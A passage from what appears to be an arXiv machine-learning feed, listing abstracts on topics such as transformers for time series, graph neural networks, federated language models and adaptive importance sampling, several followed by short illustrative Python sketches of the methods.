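Because each conditional is a cheap forward pass, evaluating (or greedily generating) a length-2k logical-operator string costs O(2k) such passes, matching the complexity claim above.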
    U-shaped Transformer: Retain High Frequency Context in Time Series Analysis. (arXiv:2307.09019v1 [cs.LG])
    Time series prediction plays a crucial role in various industrial fields. In recent years, neural networks with a transformer backbone have achieved remarkable success in many domains, including computer vision and NLP. In the time series analysis domain, however, some studies have suggested that even the simplest MLP networks outperform advanced transformer-based networks on time series forecasting tasks. We believe these findings point to low-rank properties in time series sequences. In this paper, we consider the low-pass characteristics of transformers and try to incorporate the advantages of MLPs. We adopt skip-layer connections inspired by Unet into the traditional transformer backbone, thereby preserving high-frequency context from input to output; we name the result the U-shaped Transformer. We introduce patch merge and split operations to extract features at different scales and use larger datasets to fully exploit the transformer backbone. Our experiments demonstrate that the model performs at an advanced level across multiple datasets at relatively low cost.  ( 2 min )
    Towards Automated Design of Riboswitches. (arXiv:2307.08801v1 [cs.LG])
    Experimental screening and selection pipelines for the discovery of novel riboswitches are expensive, time-consuming, and inefficient. Using computational methods to reduce the number of candidates for the screen could drastically decrease these costs. However, existing computational approaches do not fully satisfy all requirements for the design of such initial screening libraries. In this work, we present a new method, libLEARNA, capable of providing RNA focus libraries of diverse variable-length qualified candidates. Our novel structure-based design approach considers global properties as well as desired sequence and structure features. We demonstrate the benefits of our method by designing theophylline riboswitch libraries, following a previously published protocol, and yielding 30% more unique high-quality candidates.  ( 2 min )
    Meta-Value Learning: a General Framework for Learning with Learning Awareness. (arXiv:2307.08863v1 [cs.LG])
    Gradient-based learning in multi-agent systems is difficult because the gradient derives from a first-order model which does not account for the interaction between agents' learning processes. LOLA (arXiv:1709.04326) accounts for this by differentiating through one step of optimization. We extend the ideas of LOLA and develop a fully-general value-based approach to optimization. At the core is a function we call the meta-value, which at each point in joint-policy space gives for each agent a discounted sum of its objective over future optimization steps. We argue that the gradient of the meta-value gives a more reliable improvement direction than the gradient of the original objective, because the meta-value derives from empirical observations of the effects of optimization. We show how the meta-value can be approximated by training a neural network to minimize TD error along optimization trajectories in which agents follow the gradient of the meta-value. We analyze the behavior of our method on the Logistic Game and on the Iterated Prisoner's Dilemma.  ( 2 min )
    Alioth: A Machine Learning Based Interference-Aware Performance Monitor for Multi-Tenancy Applications in Public Cloud. (arXiv:2307.08949v1 [cs.DC])
    Multi-tenancy in public clouds may lead to co-location interference on shared resources, which possibly results in performance degradation of cloud applications. Cloud providers want to know when such events happen and how serious the degradation is, to perform interference-aware migrations and alleviate the problem. However, virtual machines (VM) in Infrastructure-as-a-Service public clouds are black-boxes to providers, where application-level performance information cannot be acquired. This makes performance monitoring intensely challenging as cloud providers can only rely on low-level metrics such as CPU usage and hardware counters. We propose a novel machine learning framework, Alioth, to monitor the performance degradation of cloud applications. To feed the data-hungry models, we first elaborate interference generators and conduct comprehensive co-location experiments on a testbed to build Alioth-dataset which reflects the complexity and dynamicity in real-world scenarios. Then we construct Alioth by (1) augmenting features via recovering low-level metrics under no interference using denoising auto-encoders, (2) devising a transfer learning model based on domain adaptation neural network to make models generalize on test cases unseen in offline training, and (3) developing a SHAP explainer to automate feature selection and enhance model interpretability. Experiments show that Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming the baseline methods. Alioth is also robust in signaling quality-of-service violation under dynamicity. Finally, we demonstrate a possible application of Alioth's interpretability, providing insights to benefit the decision-making of cloud operators. The dataset and code of Alioth have been released on GitHub.  ( 3 min )
    NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning. (arXiv:2307.08941v1 [cs.LG])
    Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.  ( 2 min )
    Modular Neural Network Approaches for Surgical Image Recognition. (arXiv:2307.08880v1 [cs.CV])
    Deep learning-based applications have seen a lot of success in recent years. Text, audio, image, and video have all been explored with great success using deep learning approaches. The use of convolutional neural networks (CNN) in computer vision, in particular, has yielded reliable results. In order to achieve these results, a large amount of data is required. However, the dataset cannot always be accessible. Moreover, annotating data can be difficult and time-consuming. Self-training is a semi-supervised approach that has managed to alleviate this problem and achieve state-of-the-art performance. Theoretical analysis has even shown that it may result in better generalization than a normal classifier. Another problem neural networks can face is the increasing complexity of modern problems, which requires a high computational and storage cost. To mitigate this issue, a strategy inspired by human cognition, known as modular learning, can be employed. The principle of the approach is to decompose a complex problem into simpler sub-tasks. This approach has several advantages, including faster learning, better generalization, and interpretability. In the first part of this paper, we introduce and evaluate different architectures of modular learning for Dorsal Capsulo-Scapholunate Septum (DCSS) instability classification. Our experiments have shown that modular learning improves performance compared to non-modular systems. Moreover, we found that the weighted modular approach, in which the output is weighted using the probabilities from the gating module, achieved an almost perfect classification. In the second part, we present our approach for data labeling and segmentation with self-training applied on shoulder arthroscopy images.  ( 3 min )
    The Predicted-Deletion Dynamic Model: Taking Advantage of ML Predictions, for Free. (arXiv:2307.08890v1 [cs.DS])
    The main bottleneck in designing efficient dynamic algorithms is the unknown nature of the update sequence. In particular, there are some problems, like 3-vertex connectivity, planar digraph all pairs shortest paths, and others, where the separation in runtime between the best partially dynamic solutions and the best fully dynamic solutions is polynomial, sometimes even exponential. In this paper, we formulate the predicted-deletion dynamic model, motivated by a recent line of empirical work about predicting edge updates in dynamic graphs. In this model, edges are inserted and deleted online, and when an edge is inserted, it is accompanied by a "prediction" of its deletion time. This models real world settings where services may have access to historical data or other information about an input and can subsequently use such information make predictions about user behavior. The model is also of theoretical interest, as it interpolates between the partially dynamic and fully dynamic settings, and provides a natural extension of the algorithms with predictions paradigm to the dynamic setting. We give a novel framework for this model that "lifts" partially dynamic algorithms into the fully dynamic setting with little overhead. We use our framework to obtain improved efficiency bounds over the state-of-the-art dynamic algorithms for a variety of problems. In particular, we design algorithms that have amortized update time that scales with a partially dynamic algorithm, with high probability, when the predictions are of high quality. On the flip side, our algorithms do no worse than existing fully-dynamic algorithms when the predictions are of low quality. Furthermore, our algorithms exhibit a graceful trade-off between the two cases. Thus, we are able to take advantage of ML predictions asymptotically "for free.''  ( 3 min )
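    The model's core contract, an edge insertion that carries a predicted deletion time, with guarantees degrading gracefully in the prediction error, can be sketched as a minimal interface (this is only an illustration of the model, not the paper's lifting framework):

```python
class PredictedDeletionGraph:
    """Interface sketch of the predicted-deletion dynamic model: every
    edge insertion carries a predicted deletion time, and the true
    deletion may arrive at a different time."""

    def __init__(self):
        self.predicted = {}  # edge -> predicted deletion time

    def insert(self, edge, predicted_deletion_time):
        # In the framework, an edge with an accurate prediction can be
        # routed to a fast partially dynamic structure; a mispredicted
        # edge falls back to a fully dynamic one.
        self.predicted[edge] = predicted_deletion_time

    def delete(self, edge, actual_time):
        """Return the prediction error for this edge, the quantity in
        which the lifted algorithm's update time degrades."""
        return abs(actual_time - self.predicted.pop(edge))

g = PredictedDeletionGraph()
g.insert(("u", "v"), predicted_deletion_time=10)
err = g.delete(("u", "v"), actual_time=12)
```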
    Classification with Incoherent Kernel Dictionary Learning. (arXiv:2307.08796v1 [cs.LG])
    In this paper we present a new classification method based on Dictionary Learning (DL). The main contribution consists of a kernel version of incoherent DL, derived from its standard linear counterpart. We also propose an improvement of the AK-SVD algorithm concerning the representation update. Our algorithms are tested on several popular databases of classification problems.  ( 2 min )
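    The incoherence being penalized is the mutual coherence of the dictionary, the largest absolute inner product between distinct normalized atoms; in the kernel version, inner products are replaced by kernel evaluations. A small numpy sketch of the linear quantity (an illustration, not the paper's algorithm):

```python
import numpy as np

def mutual_coherence(D):
    """Mutual coherence of a dictionary D (atoms as columns): the largest
    absolute inner product between distinct normalised atoms. Incoherent
    DL adds a penalty pushing this value down."""
    Dn = D / np.linalg.norm(D, axis=0, keepdims=True)  # unit-norm atoms
    G = Dn.T @ Dn                                      # Gram matrix
    np.fill_diagonal(G, 0.0)                           # ignore self-products
    return np.abs(G).max()

# An orthonormal dictionary is perfectly incoherent; two nearly parallel
# atoms are highly coherent.
orthonormal = np.eye(4)
coherent = np.array([[1.0, 0.9],
                     [0.0, 0.435]])
```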
    A Meta-Learning Based Precoder Optimization Framework for Rate-Splitting Multiple Access. (arXiv:2307.08822v1 [eess.SP])
    In this letter, we propose the use of a meta-learning based precoder optimization framework to directly optimize the Rate-Splitting Multiple Access (RSMA) precoders with partial Channel State Information at the Transmitter (CSIT). By exploiting the overfitting of the compact neural network to maximize the explicit Average Sum-Rate (ASR) expression, we effectively bypass the need for any other training data while minimizing the total running time. Numerical results reveal that the meta-learning based solution achieves similar ASR performance to conventional precoder optimization in medium-scale scenarios, and significantly outperforms sub-optimal low complexity precoder algorithms in the large-scale regime.  ( 2 min )
    Natural Actor-Critic for Robust Reinforcement Learning with Function Approximation. (arXiv:2307.08875v1 [cs.LG])
    We study robust reinforcement learning (RL) with the goal of determining a well-performing policy that is robust against model mismatch between the training simulator and the testing environment. Previous policy-based robust RL algorithms mainly focus on the tabular setting under uncertainty sets that facilitate robust policy evaluation, but are no longer tractable when the number of states scales up. To this end, we propose two novel uncertainty set formulations, one based on double sampling and the other on an integral probability metric. Both make large-scale robust RL tractable even when one only has access to a simulator. We propose a robust natural actor-critic (RNAC) approach that incorporates the new uncertainty sets and employs function approximation. We provide finite-time convergence guarantees for the proposed RNAC algorithm to the optimal robust policy within the function approximation error. Finally, we demonstrate the robust performance of the policy learned by our proposed RNAC approach in multiple MuJoCo environments and a real-world TurtleBot navigation task.  ( 2 min )
    IxDRL: A Novel Explainable Deep Reinforcement Learning Toolkit based on Analyses of Interestingness. (arXiv:2307.08933v1 [cs.AI])
    In recent years, advances in deep learning have resulted in a plethora of successes in the use of reinforcement learning (RL) to solve complex sequential decision tasks with high-dimensional inputs. However, existing RL-based systems are essentially competency-unaware: they lack the interpretation mechanisms that would allow human operators to gain an insightful, holistic view of their competence, presenting an impediment to their adoption, particularly in critical applications where the decisions an agent makes can have significant consequences. Towards more explainable Deep RL (xDRL), we propose a new framework based on analyses of interestingness. Our tool provides various measures of RL agent competence stemming from interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit. We showcase the use of our framework by applying the proposed pipeline in a set of scenarios of varying complexity. We empirically assess the capability of the approach in identifying agent behavior patterns and competency-controlling conditions, and the task elements mostly responsible for an agent's competence, based on global and local analyses of interestingness. Overall, we show that our framework can provide agent designers with insights about RL agent competence, both their capabilities and limitations, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.  ( 3 min )
    Towards the Sparseness of Projection Head in Self-Supervised Learning. (arXiv:2307.08913v1 [cs.LG])
    In recent years, self-supervised learning (SSL) has emerged as a promising approach for extracting valuable representations from unlabeled data. One successful SSL method is contrastive learning, which aims to bring positive examples closer while pushing negative examples apart. Many current contrastive learning approaches utilize a parameterized projection head. Through a combination of empirical analysis and theoretical investigation, we provide insights into the internal mechanisms of the projection head and its relationship with the phenomenon of dimensional collapse. Our findings demonstrate that the projection head enhances the quality of representations by performing contrastive loss in a projected subspace. Therefore, we propose an assumption that only a subset of features is necessary when minimizing the contrastive loss of a mini-batch of data. Theoretical analysis further suggests that a sparse projection head can enhance generalization, leading us to introduce SparseHead - a regularization term that effectively constrains the sparsity of the projection head, and can be seamlessly integrated with any self-supervised learning (SSL) approaches. Our experimental results validate the effectiveness of SparseHead, demonstrating its ability to improve the performance of existing contrastive methods.  ( 2 min )
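    The standard surrogate for constraining sparsity is an L1 term on the projection-head weights added to the contrastive loss; the paper's exact regularizer may differ, but a sketch of that idea is one line:

```python
import numpy as np

def sparsehead_penalty(head_weights, lam=1e-3):
    """SparseHead-style regulariser sketch: an L1 term on the projection
    head's weight matrix, added to the contrastive loss so the head uses
    only a subset of features. (Illustrative; the paper's exact term may
    differ.)"""
    return lam * np.abs(head_weights).sum()

# total_loss = contrastive_loss + sparsehead_penalty(W)
W = np.array([[0.5, 0.0],
              [-0.25, 0.0]])
penalty = sparsehead_penalty(W, lam=0.1)
```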
    regulAS: A Bioinformatics Tool for the Integrative Analysis of Alternative Splicing Regulome using RNA-Seq data. (arXiv:2307.08800v1 [q-bio.GN])
    The regulAS software package is a bioinformatics tool designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations through integrative analysis of large-scale RNA-Seq data from cancer and healthy human donors, characterized by TCGA and GTEx projects. This technical report provides a comprehensive overview of regulAS, focusing on its core functionality, basic modules, experiment configuration, further extensibility and customisation. The core functionality of regulAS enables the automation of computational experiments, efficient results storage and processing, and streamlined workflow management. Integrated basic modules extend regulAS with features such as RNA-Seq data retrieval from the public multi-omics UCSC Xena data repository, predictive modeling and feature ranking capabilities using the scikit-learn package, and flexible reporting generation for analysing gene expression profiles and relevant modulations of alternative splicing aberrations across tissues and cancer types. Experiment configuration is handled through YAML files with the Hydra and OmegaConf libraries, offering a user-friendly approach. Additionally, regulAS allows for the development and integration of custom modules to handle specialized tasks. In conclusion, regulAS provides an automated solution for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, while the extensibility of the pipeline enables researchers to further tailor the software package to their specific needs. Source code is available under the MIT license at https://github.com/slipnitskaya/regulAS.  ( 2 min )
    Examining the Effects of Degree Distribution and Homophily in Graph Learning Models. (arXiv:2307.08881v1 [cs.SI])
    Despite a surge in interest in GNN development, homogeneity in benchmarking datasets still presents a fundamental issue to GNN research. GraphWorld is a recent solution which uses the Stochastic Block Model (SBM) to generate diverse populations of synthetic graphs for benchmarking any GNN task. Despite its success, the SBM imposed fundamental limitations on the kinds of graph structure GraphWorld could create. In this work we examine how two additional synthetic graph generators can improve GraphWorld's evaluation: LFR, a well-established model in the graph clustering literature, and CABAM, a recent adaptation of the Barabasi-Albert model tailored for GNN benchmarking. By integrating these generators, we significantly expand the coverage of graph space within the GraphWorld framework while preserving key graph properties observed in real-world networks. To demonstrate their effectiveness, we generate 300,000 graphs to benchmark 11 GNN models on a node classification task. We find GNN performance variations in response to homophily, degree distribution and feature signal. Based on these findings, we classify models by their sensitivity to the new generators under these properties. Additionally, we release the extensions made to GraphWorld on the GitHub repository, offering further evaluation of GNN performance on new graphs.  ( 2 min )
    Sharpness-Aware Graph Collaborative Filtering. (arXiv:2307.08910v1 [cs.LG])
    Graph Neural Networks (GNNs) have achieved impressive performance in collaborative filtering. However, GNNs tend to yield inferior performance when the distributions of training and test data are not aligned well. Also, training GNNs requires optimizing non-convex neural networks with an abundance of local and global minima, which may differ widely in their performance at test time. Thus, it is essential to choose the minima carefully. Here we propose an effective training schema, called gSAM, under the principle that \textit{flatter} minima have better generalization ability than \textit{sharper} ones. To achieve this goal, gSAM regularizes the flatness of the weight loss landscape by forming a bi-level optimization: the outer problem conducts the standard model training while the inner problem helps the model jump out of sharp minima. Experimental results show the superiority of our gSAM.  ( 2 min )
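    The inner/outer structure is the sharpness-aware (SAM-style) update: the inner step climbs to an adversarially perturbed point in a small neighbourhood, and the outer step descends with the gradient taken there. A toy numpy sketch of that update on a quadratic loss (illustrative only; gSAM's exact formulation is in the paper):

```python
import numpy as np

def sam_gradient(w, grad_fn, rho=0.05):
    """Sharpness-aware gradient: evaluate the gradient at the perturbed
    point w + rho * g / ||g||, steering optimisation toward flat minima.
    grad_fn returns dL/dw; rho is the neighbourhood radius."""
    g = grad_fn(w)
    norm = np.linalg.norm(g) + 1e-12
    w_adv = w + rho * g / norm   # inner problem: step toward sharper loss
    return grad_fn(w_adv)        # outer problem: descend with this gradient

# Toy quadratic loss L(w) = 0.5 * ||w||^2, so dL/dw = w.
grad_fn = lambda w: w
w = np.array([1.0, -2.0])
for _ in range(100):
    w = w - 0.1 * sam_gradient(w, grad_fn, rho=0.05)
```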
    Autoregressive Diffusion Model for Graph Generation. (arXiv:2307.08849v1 [cs.AI])
    Diffusion-based graph generative models have recently obtained promising results for graph generation. However, existing diffusion-based graph generative models are mostly one-shot generative models that apply Gaussian diffusion in the dequantized adjacency matrix space. Such a strategy can suffer from difficulty in model training, slow sampling speed, and incapability of incorporating constraints. We propose an \emph{autoregressive diffusion} model for graph generation. Unlike existing methods, we define a node-absorbing diffusion process that operates directly in the discrete graph space. For forward diffusion, we design a \emph{diffusion ordering network}, which learns a data-dependent node absorbing ordering from graph topology. For reverse generation, we design a \emph{denoising network} that uses the reverse node ordering to efficiently reconstruct the graph by predicting the node type of the new node and its edges with previously denoised nodes at a time. Based on the permutation invariance of graph, we show that the two networks can be jointly trained by optimizing a simple lower bound of data likelihood. Our experiments on six diverse generic graph datasets and two molecule datasets show that our model achieves better or comparable generation performance with previous state-of-the-art, and meanwhile enjoys fast generation speed.  ( 2 min )
    Latent Space Representations of Neural Algorithmic Reasoners. (arXiv:2307.08874v1 [cs.LG])
    Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.  ( 2 min )
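    The proposed softmax aggregator replaces the hard max over incoming messages with a temperature-controlled softmax-weighted sum, a smooth relaxation that keeps similar values distinguishable. A small numpy sketch (toy messages; not the Triplet-GMPNN implementation):

```python
import numpy as np

def max_aggregate(messages):
    """Hard max over incoming messages (rows), per feature."""
    return messages.max(axis=0)

def softmax_aggregate(messages, temperature=0.1):
    """Softmax-weighted sum per feature: a smooth relaxation of max;
    temperature -> 0 recovers the hard max."""
    shifted = (messages - messages.max(axis=0, keepdims=True)) / temperature
    w = np.exp(shifted)                      # numerically stable weights
    w = w / w.sum(axis=0, keepdims=True)
    return (w * messages).sum(axis=0)

msgs = np.array([[1.0, 0.2],
                 [0.9, 0.1],
                 [0.0, 0.3]])
```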
    Federated Large Language Model: A Position Paper. (arXiv:2307.08925v1 [cs.LG])
    Large scale language models (LLM) have received significant attention and found diverse applications across various domains, but their development encounters challenges in real-world scenarios. These challenges arise due to the scarcity of public domain data availability and the need to maintain privacy with respect to private domain data. To address these issues, federated learning (FL) has emerged as a promising technology that enables collaborative training of shared models while preserving decentralized data. We propose the concept of federated LLM, which comprises three key components, i.e., federated LLM pre-training, federated LLM fine-tuning, and federated LLM prompt engineering. For each component, we discuss its advantage over traditional LLM training methods and propose specific engineering strategies for implementation. Furthermore, we explore the novel challenges introduced by the integration of FL and LLM. We analyze existing solutions and identify potential obstacles faced by these solutions within the context of federated LLM.  ( 2 min )
    Disentangling Node Attributes from Graph Topology for Improved Generalizability in Link Prediction. (arXiv:2307.08877v1 [cs.LG])
    Link prediction is a crucial task in graph machine learning with diverse applications. We explore the interplay between node attributes and graph topology and demonstrate that incorporating pre-trained node attributes improves the generalization power of link prediction models. Our proposed method, UPNA (Unsupervised Pre-training of Node Attributes), solves the inductive link prediction problem by learning a function that takes a pair of node attributes and predicts the probability of an edge, as opposed to Graph Neural Networks (GNN), which can be prone to topological shortcuts in graphs with power-law degree distribution. In this manner, UPNA learns a significant part of the latent graph generation mechanism since the learned function can be used to add incoming nodes to a growing graph. By leveraging pre-trained node attributes, we overcome observational bias and make meaningful predictions about unobserved nodes, surpassing state-of-the-art performance (3X to 34X improvement on benchmark datasets). UPNA can be applied to various pairwise learning tasks and integrated with existing link prediction models to enhance their generalizability and bolster graph generative models.  ( 2 min )
    Multi-stage Neural Networks: Function Approximator of Machine Precision. (arXiv:2307.08934v1 [cs.LG])
    Deep learning techniques are increasingly applied to scientific problems, where the precision of networks is crucial. Despite being deemed universal function approximators, neural networks in practice struggle to reduce prediction errors below $O(10^{-5})$, even with large network sizes and extended training iterations. To address this issue, we developed multi-stage neural networks, which divide the training process into stages, with each stage using a new network optimized to fit the residue from the previous stage. Across successive stages, the residue magnitudes decrease substantially and follow an inverse power-law relationship with the residue frequencies. The multi-stage neural networks effectively mitigate the spectral biases associated with regular neural networks, enabling them to capture the high-frequency features of target functions. We demonstrate that the prediction error from multi-stage training, for both regression problems and physics-informed neural networks, can nearly reach the machine precision $O(10^{-16})$ of double-precision floating point within a finite number of iterations. Such levels of accuracy are rarely attainable using single neural networks alone.  ( 2 min )
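    The stage-wise idea, fit a fresh model to the residue left by the previous stages, can be sketched with least-squares polynomials standing in for the networks (the paper trains fresh neural networks per stage; here later stages simply get more capacity so the residue keeps shrinking):

```python
import numpy as np

def multi_stage_fit(x, y, degrees=(3, 6, 9)):
    """Multi-stage training sketch: each stage fits a fresh model (here a
    least-squares polynomial, standing in for a neural network) to the
    residue left by the previous stages."""
    models, residue, residue_norms = [], y.copy(), []
    for deg in degrees:
        coeffs = np.polyfit(x, residue, deg)       # fit the current residue
        models.append(coeffs)
        residue = residue - np.polyval(coeffs, x)  # pass the rest onward
        residue_norms.append(np.abs(residue).max())
    return models, residue, residue_norms

x = np.linspace(-1.0, 1.0, 200)
y = np.sin(3.0 * x)
models, residue, residue_norms = multi_stage_fit(x, y)
```

    Each stage shrinks the maximum residue by roughly an order of magnitude on this toy target, mirroring the stage-wise error decay the paper reports.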
    A mixed policy to improve performance of language models on math problems. (arXiv:2307.08767v1 [cs.CL])
    When solving math problems, most language models use a sampling strategy to predict the next word according to conditional probabilities, which may produce wrong answers during math reasoning steps. Considering that math problems are deterministic, we propose a mixed-policy exploration approach to solve math problems with reinforcement learning. In particular, we propose a two-level token exploration policy: the abstract level explores the next token with probability, while the second level is deterministic. Specifically, the abstract-level policy decides whether the token is an operator or an operand via probability sampling, while the second level deterministically selects the next token with the highest score in a greedy way. We test our method on the GSM8K dataset with a GPT-2 model and demonstrate a performance gain of more than $2\%$. Our implementation is available at https://github.com/vividitytech/math_lm_rl.  ( 2 min )
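    The two-level policy can be sketched in a few lines: sample the token *type* stochastically, then pick the highest-scoring token of that type greedily. The `toy_scores` function below is a hypothetical stand-in for the language model's logits, not the paper's GPT-2 setup:

```python
import random

OPERATORS = ["+", "-", "*", "/"]
OPERANDS = ["1", "2", "3", "x"]

def toy_scores(kind, context):
    """Hypothetical stand-in for the language model's scores over the
    operator or operand sub-vocabulary given the current context."""
    vocab = OPERATORS if kind == "operator" else OPERANDS
    return {tok: float(len(context) + i) for i, tok in enumerate(vocab)}

def mixed_policy_step(context, p_operator=0.5, rng=random):
    """Abstract level: sample the token type (operator vs operand) with
    probability. Concrete level: greedy argmax within that type."""
    kind = "operator" if rng.random() < p_operator else "operand"
    scores = toy_scores(kind, context)
    return max(scores, key=scores.get)

rng = random.Random(0)
tokens = [mixed_policy_step([], rng=rng) for _ in range(10)]
```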
    Learning to Sample Tasks for Meta Learning. (arXiv:2307.08924v1 [cs.LG])
    Through experiments on various meta-learning methods, task samplers, and few-shot learning tasks, this paper arrives at three conclusions. First, there is no universal task-sampling strategy that guarantees the performance of meta-learning models. Second, task diversity can cause the models to either underfit or overfit during training. Third, the generalization performance of the models is influenced by task divergence, task entropy, and task difficulty. In response to these findings, we propose a novel task sampler called Adaptive Sampler (ASr). ASr is a plug-and-play task sampler that takes task divergence, task entropy, and task difficulty into account when sampling tasks. To optimize ASr, we rethink and propose a simple and general meta-learning algorithm. Finally, extensive empirical experiments demonstrate the effectiveness of the proposed ASr.  ( 2 min )
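    One simple way to turn per-task divergence, entropy, and difficulty scores into sampling probabilities is a softmax over their combination. The paper learns the combination; the additive form below is only an illustrative assumption:

```python
import math
import random

def adaptive_task_weights(divergence, entropy, difficulty, temperature=1.0):
    """ASr-style sampler sketch: combine per-task divergence, entropy and
    difficulty scores into softmax sampling weights. The additive
    combination here is a placeholder for the paper's learned one."""
    scores = [(d + e + f) / temperature
              for d, e, f in zip(divergence, entropy, difficulty)]
    m = max(scores)                              # stabilise the softmax
    exps = [math.exp(s - m) for s in scores]
    total = sum(exps)
    return [v / total for v in exps]

weights = adaptive_task_weights([0.2, 0.9], [0.5, 0.1], [0.3, 0.8])
# Sample a training task according to the adaptive weights.
chosen = random.Random(0).choices(range(2), weights=weights, k=5)
```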
    Batched Predictors Generalize within Distribution. (arXiv:2307.09379v1 [stat.ML])
    We study the generalization properties of batched predictors, i.e., models tasked with predicting the mean label of a small set (or batch) of examples. The batched prediction paradigm is particularly relevant for models deployed to determine the quality of a group of compounds in preparation for offline testing. By utilizing a suitable generalization of the Rademacher complexity, we prove that batched predictors come with exponentially stronger generalization guarantees as compared to the standard per-sample approach. Surprisingly, the proposed bound holds independently of overparametrization. Our theoretical insights are validated experimentally for various tasks, architectures, and applications.  ( 2 min )
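    In the batched setting, the predictor is scored against the *mean* label of each batch rather than against individual labels, so per-sample noise averages out. A small numpy sketch on synthetic data (illustrative; not the paper's experiments):

```python
import numpy as np

def batched_loss(model, xs, ys, batch_size):
    """Score the model on the mean label of each batch, matching the
    batched-predictor setting."""
    n = (len(xs) // batch_size) * batch_size
    xb = xs[:n].reshape(-1, batch_size)
    yb = ys[:n].reshape(-1, batch_size).mean(axis=1)  # mean label per batch
    preds = model(xb).mean(axis=1)                    # mean prediction per batch
    return np.mean((preds - yb) ** 2)

rng = np.random.default_rng(0)
xs = rng.normal(size=100)
ys = 2.0 * xs + rng.normal(scale=0.5, size=100)   # noisy linear labels
model = lambda x: 2.0 * x                         # the true mean function

per_sample_mse = np.mean((model(xs) - ys) ** 2)
batched_mse = batched_loss(model, xs, ys, batch_size=10)
```

    For the true mean function, the batched loss is far smaller than the per-sample loss because independent label noise cancels within each batch.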
    Optimistic Estimate Uncovers the Potential of Nonlinear Models. (arXiv:2307.08921v1 [cs.LG])
    We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.  ( 2 min )
    Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction. (arXiv:2307.08893v1 [cs.LG])
    High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.  ( 2 min )
    Adaptively Optimised Adaptive Importance Samplers. (arXiv:2307.09341v1 [stat.CO])
We introduce a new class of adaptive importance samplers leveraging adaptive optimisation tools, which we term AdaOAIS. We build on Optimised Adaptive Importance Samplers (OAIS), a class of techniques that adapt proposals to improve the mean-squared error of the importance sampling estimators by parameterising the proposal and optimising the $\chi^2$-divergence between the target and the proposal. We show that a naive implementation of OAIS using stochastic gradient descent may lead to unstable estimators despite its convergence guarantees. To remedy this shortcoming, we instead propose to use adaptive optimisers (such as AdaGrad and Adam) to improve the stability of the OAIS. We provide convergence results for AdaOAIS in a similar manner to OAIS. We also provide empirical demonstrations on a variety of examples and show that AdaOAIS leads to stable importance sampling estimators in practice.
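As a concrete illustration of the OAIS objective and of the stabilising role of an adaptive optimiser, here is a minimal one-dimensional sketch (a toy target and hand-rolled Adam update, not the paper's setup): the proposal mean is adapted by stochastic gradient descent on the second moment of the importance weights, $\rho(\theta) = \mathbb{E}_{q_\theta}[(p/q_\theta)^2]$, which is the $\chi^2$-divergence up to a constant.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy setup: target p = N(3, 1), proposal q_theta = N(theta, 1).
# The gradient of rho(theta) = E_q[(p/q)^2] has the unbiased estimator
#   g = -mean(w^2 * d/dtheta log q_theta(x)),  w = p(x)/q(x),  x ~ q_theta,
# and for a Gaussian proposal d/dtheta log q_theta(x) = (x - theta).
def log_p(x):
    return -0.5 * (x - 3.0) ** 2

def grad_estimate(theta, batch=64):
    x = rng.normal(theta, 1.0, size=batch)
    log_w = log_p(x) - (-0.5 * (x - theta) ** 2)   # log p/q (normalisers cancel)
    w2 = np.exp(2.0 * np.clip(log_w, -20, 20))     # clipped for numerical safety
    return -np.mean(w2 * (x - theta))

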